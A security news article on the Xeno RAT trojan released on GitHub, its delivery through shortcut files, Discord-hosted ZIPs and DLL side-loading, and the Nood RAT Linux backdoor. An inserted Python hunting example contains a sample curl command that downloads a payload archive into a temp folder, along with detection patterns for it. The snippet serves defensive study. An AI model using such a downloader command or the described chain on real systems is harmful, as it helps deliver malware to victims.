
On GitHub, an open-source Xeno RAT Trojan emerges as a potent threat.

The Hacker News | Malware / Network Security | February 27, 2024

Xeno RAT, an “intricately designed” remote access trojan, has been made freely available on GitHub for other actors.

The open-source RAT, which is written in C# and is compatible with Windows 10 and Windows 11, has a “comprehensive set of features for remote system management,” according to its creator, who goes by the name moom825.

The package includes a SOCKS5 reverse proxy and real-time audio recording, along with a hidden virtual network computing (hVNC) module similar to DarkVNC, which enables attackers to gain remote access to an infected computer.

The project’s developer states that “Xeno RAT was created entirely from scratch, guaranteeing a distinctive and personalized approach to remote access tools.” Another important feature is a builder that makes it possible to create individual malware variants.

moom825 is also the author of another C#-based RAT called DiscordRAT 2.0, which was distributed by threat actors within a malicious npm package called node-hide-console-windows, as disclosed by ReversingLabs in October 2023.

In a report released last week, cybersecurity firm Cyfirma said it had observed Xeno RAT being distributed through the Discord content delivery network (CDN), again highlighting how the rise in affordable and freely available malware is driving more campaigns that use RATs.

The company says the main vector is a shortcut file, disguised as a WhatsApp screenshot, that acts as a downloader. The downloader fetches a ZIP archive from the Discord CDN, then extracts and executes the next-stage payload.

The multi-stage sequence uses a technique known as DLL side-loading to launch a malicious DLL while establishing persistence and avoiding detection and analysis.
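One way to hunt for the chain described above (a shortcut-launched downloader pulling a ZIP from the Discord CDN, followed by DLL side-loading), as an added example that is not from the article or the Cyfirma report. The event fields, host names, paths and the 10-minute correlation window are constructed assumptions.

```python
import ntpath
import re
from datetime import datetime, timedelta

# Constructed telemetry (not taken from the Cyfirma report); field names are assumptions.
EVENTS = [
    {"host": "ws01", "time": "2024-02-20T10:00:05", "type": "process",
     "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd /c curl -o %TEMP%\\p.zip https://cdn.discordapp.com/attachments/1/2/p.zip?ex=0"},
    {"host": "ws01", "time": "2024-02-20T10:00:40", "type": "image_load", "signed": False,
     "image": "C:\\Users\\a\\AppData\\Local\\Temp\\p\\viewer.exe",
     "loaded": "C:\\Users\\a\\AppData\\Local\\Temp\\p\\helper.dll"},
    {"host": "ws02", "time": "2024-02-20T10:01:00", "type": "process",  # benign: browser opening an image
     "parent": "explorer.exe", "image": "chrome.exe",
     "cmdline": "chrome.exe https://cdn.discordapp.com/attachments/1/2/cat.png"},
    {"host": "ws03", "time": "2024-02-20T10:02:00", "type": "image_load", "signed": False,
     "image": "C:\\Users\\b\\Downloads\\tool\\tool.exe",  # side-load shape, but no download stage seen
     "loaded": "C:\\Users\\b\\Downloads\\tool\\plugin.dll"},
]

DISCORD_ZIP = re.compile(r"https://cdn\.discordapp\.com/\S+\.zip\b", re.I)
INTERPRETERS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads|public)\\", re.I)

def is_download_stage(e):
    """A shortcut opened by the user starts its target under explorer.exe."""
    return (e["type"] == "process" and e["parent"].lower() == "explorer.exe"
            and e["image"].lower() in INTERPRETERS
            and DISCORD_ZIP.search(e["cmdline"]) is not None)

def is_sideload_candidate(e):
    """Unsigned DLL loaded from the loading executable's own user-writable folder."""
    if e["type"] != "image_load" or e["signed"]:
        return False
    same_dir = ntpath.dirname(e["image"]).lower() == ntpath.dirname(e["loaded"]).lower()
    return same_dir and bool(USER_WRITABLE.search(e["loaded"]))

def correlate(events, window=timedelta(minutes=10)):
    """Return (host, exe, dll) where a side-load follows a download stage on the same host."""
    downloads, hits = {}, []
    for e in sorted(events, key=lambda ev: ev["time"]):
        t = datetime.fromisoformat(e["time"])
        if is_download_stage(e):
            downloads[e["host"]] = t
        elif is_sideload_candidate(e):
            start = downloads.get(e["host"])
            if start is not None and t - start <= window:
                hits.append((e["host"], ntpath.basename(e["image"]), ntpath.basename(e["loaded"])))
    return hits
```

Requiring both stages on one host keeps the lone side-load-shaped event on ws03 and the browser traffic on ws02 out of the results.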

The development comes as the AhnLab Security Intelligence Center (ASEC) revealed the use of a Gh0st RAT variant known as Nood RAT, which is used in attacks against Linux systems and enables adversaries to obtain sensitive information.

Nood RAT is a backdoor malware that can receive commands from the C&C server to perform malicious tasks like downloading malicious files, stealing system internal files, and even executing commands, according to ASEC.

It has an encryption feature to evade network packet detection and can be used by threat actors to carry out multiple malicious activities, ASEC says.
